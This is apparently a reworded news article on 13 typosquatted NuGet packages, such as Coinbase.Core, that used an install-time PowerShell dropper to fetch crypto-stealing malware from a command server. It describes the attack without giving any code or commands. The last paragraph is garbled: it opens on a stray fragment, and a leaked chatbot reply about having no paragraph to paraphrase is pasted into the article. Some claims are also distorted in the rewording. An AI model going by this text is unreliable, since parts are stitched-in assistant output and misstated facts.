Rogue NuGet Packages Infect .NET Developers with Crypto-Stealing Malware


A new advanced and extremely harmful cyber attack is aimed at the NuGet repository with the goal of spreading malware that steals cryptocurrency among .NET developers.

The 13 unauthorized software bundles, which had been downloaded over 160000 times within the previous month, have now been removed.

Natan Nehorai and Brian Moussalli, researchers at JFrog, explained that when the packages were installed, a PowerShell script would activate and initiate the downloading of a payload. The payload, referred to as the 'second stage', could then be remotely executed.

Previously, there have been instances of security weaknesses found in NuGet packages, and they have been exploited to spread phishing links. However, this occurrence represents a significant breakthrough as it is the first time that packages with harmful code have been detected.

The download count for three popular packages, Coinbase.Core, Anarchy.Wrapper.Net, and DiscordRichPresence.API, totaled 166000 downloads. However, it is possible that the number of downloads were artificially inflated by threat actors using bots to make them seem more authentic.

The persistent use of typosquatting methods is evident in the usage of Coinbase and Discord, where counterfeit packages are given names resembling authentic ones to deceive developers into downloading them.

The software packages contain a type of malicious software that operates as a dropper script. Its purpose is to initiate a PowerShell code automatically, which then downloads another binary file from a server that has been pre-programmed.

To make things more confusing, certain packages opted to not include a harmful component directly. Instead, they obtained it as a dependency through another package that was intentionally rigged.

Furthermore, it is alarming that the link to the command-and-control (C2) server is established through HTTP instead of HTTPS, thereby making it susceptible to an attack by a malicious third party intercepting the communication (known as an adversary-in-the-middle or AiTM attack).

JFrog explains that the second-level malware is an exclusive payload which can be interchanged dynamically because it is downloaded from the C2 server.

The next stage provides various functions such as a tool that steals cryptographic data and a module that automatically checks with the command and control server for a new edition of the malicious software.

As developers' systems can be compromised through the software supply chain, and backdoored code can be spread to downstream users undetected, this pathway has become a highly profitable target.

In a statement shared with The Hacker News, Shachar Menashe, Senior Director at JFrog Security Research, stated that this is evidence that there is no safe open source repository from harmful individuals.

secure. It is important for .NET developers who use NuGet to exercise caution when selecting open-source components for their builds, as there is a considerable risk of being infected by malicious code. This caution should be taken throughout the entire software development process to maintain secure software supply chain practices. I'm sorry, there is no paragraph provided to be paraphrased. Please provide the original paragraph that needs to be paraphrased.

Post a Comment

Previous Post Next Post